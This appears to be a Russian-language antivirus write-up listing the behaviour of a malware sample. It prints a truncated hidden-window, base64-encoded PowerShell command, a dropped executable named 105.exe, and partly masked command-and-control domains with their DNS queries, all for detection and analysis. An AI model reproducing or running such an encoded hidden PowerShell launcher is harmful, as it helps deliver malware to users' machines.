Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAG4AawBrAHAAYQBkAHMAbAByAHEAZwA9ACcATgBmAHgAcQB2AG0AYQBmAHMAZgB1AGcAJwA7ACQAQwBjAHIAZgBjAGoAdAB5AG8AaABhAGgAYgAgAD0AIAAnADEAMAA1ACcAOwAkAEkAZgB0AGMAcQB2AG8AaAA9ACcAVwB5AGsAZwB...
- %HOMEPATH%\105.exe
- 'in######.farmaciaartesanal.com':443
- 'ol###ehls.com':443
- DNS ASK in######.farmaciaartesanal.com
- DNS ASK ol###ehls.com
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-a40.a30.a3c'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAG4AawBrAHAAYQBkAHMAbAByAHEAZwA9ACcATgBmAHgAcQB2AG0AYQBmAHMAZgB1AGcAJwA7ACQAQwBjAHIAZgBjAGoAdAB5AG8AaABhAGgAYgAgAD0AIAAnADEAMAA1ACcAOwAkAEkAZgB0AGMAcQB2AG8AaAA9ACcAVwB5AGsAZwB...' (со скрытым окном)
- '<SYSTEM32>\ntvdm.exe' -i1